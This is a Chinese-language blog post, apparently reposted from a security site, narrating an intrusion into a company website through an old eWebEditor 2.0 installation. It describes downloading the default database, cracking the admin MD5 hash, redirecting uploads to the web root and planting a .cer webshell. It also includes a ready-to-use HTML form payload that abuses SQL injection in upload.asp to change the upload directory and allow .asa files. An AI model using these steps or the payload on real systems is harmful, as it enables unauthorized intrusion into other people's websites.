一次入侵记录

一个企业站,有注入找不到管理员字段,有后台常用默认密码进不去。明小子扫目录存在old目录,打开是老版网站,貌似是一整套程序但没有看出来哪套程序.以old目录为扫描,扫出ewebeditor目录,有默认后台old/ewebeditor/admin_login.asp,默认帐号admin、密码admin不对,下载ewebeditor/db/ewebeditor.mdb默认数据库,查看版本为2.0,密码MD5收费,无别人留下后门,ewebeditor2.0版本应该存在两个漏洞,一个是注入,另一个是上传(就是ewebeditor asp版 2.1.6 上传漏洞.htm,因为2.16都存在何况2.0呢),修改网址上传cer木马,但uploadfile目录无执行脚本权限,只有浪费好友“了无痕”兄弟一毛钱破出md5进后台拷贝standard样式为standard1,设置上传目录为/(根目录),预览编辑器上传发现所有上传的对话框弹出错误(确定不属于IE7\IE8版本问题),关键思路:打开2.16版上传EXP,修改网址及standard为standard1,再次上传cer文件成功,地址为:www.***.com/*.cer,因为standard1样式已经设置了上传目录为根目录。
简单吧?有时思路是要变通一下,再次感谢好友了无痕GG。
小弟在T00LS发贴又学到了一招,其实没有这么麻烦,可以通过通过注入来控制上传的目录,闷豆大哥的招数:
<form action=”http://www.abc.com/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=horind’ union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b’/../db’,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|asa’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
其实当时就应该想到的,可以通过注入添加后缀就同样可以用注入更改上传目录,惭愧!膜拜一下豆哥!
本文摘自网络由网络安全(www.91ri.org)收集整理.